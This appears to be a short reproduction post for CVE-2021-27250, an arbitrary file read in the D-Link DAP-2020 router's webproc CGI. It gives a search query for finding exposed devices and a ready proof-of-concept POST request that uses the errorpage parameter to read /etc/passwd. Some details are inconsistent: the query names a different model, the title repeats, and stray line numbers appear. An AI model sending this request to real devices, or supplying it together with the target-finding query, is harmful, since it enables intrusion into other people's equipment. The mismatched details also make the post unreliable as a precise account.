D Link Dap 2020 Webproc Arbitrary File Reading Vulnerability Cve 2021 27250
D Link Dap 2020 Webproc Arbitrary File Reading Vulnerability Cve 2021 27250
D-LINK DAP-2020 webproc arbitrary file reading vulnerability CVE-2021-27250
Vulnerability Description
Recently, D-Link issued an announcement [1] saying that its product DAP-2020 has an arbitrary file reading vulnerability, and the CVE number is CVE-2021-27250. It has been tested on the hardware version: A1, firmware version: 1.01. Since the vulnerability affects the core components, other versions may also be affected by this vulnerability.
Vulnerability Impact
D-LINK DAP-2020
Network surveying and mapping
body=”DAP-1360” && body=”6.05”
Vulnerability reappears
Login page
Verify POC
1
2
3
POST /cgi-bin/webproc
getpage=html%2Findex.html&errorpage=/etc/passwd&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=123&%3Aaction=login&%3Asessionid=3c1f7123
This post is licensed under CC BY 4.0 by the author.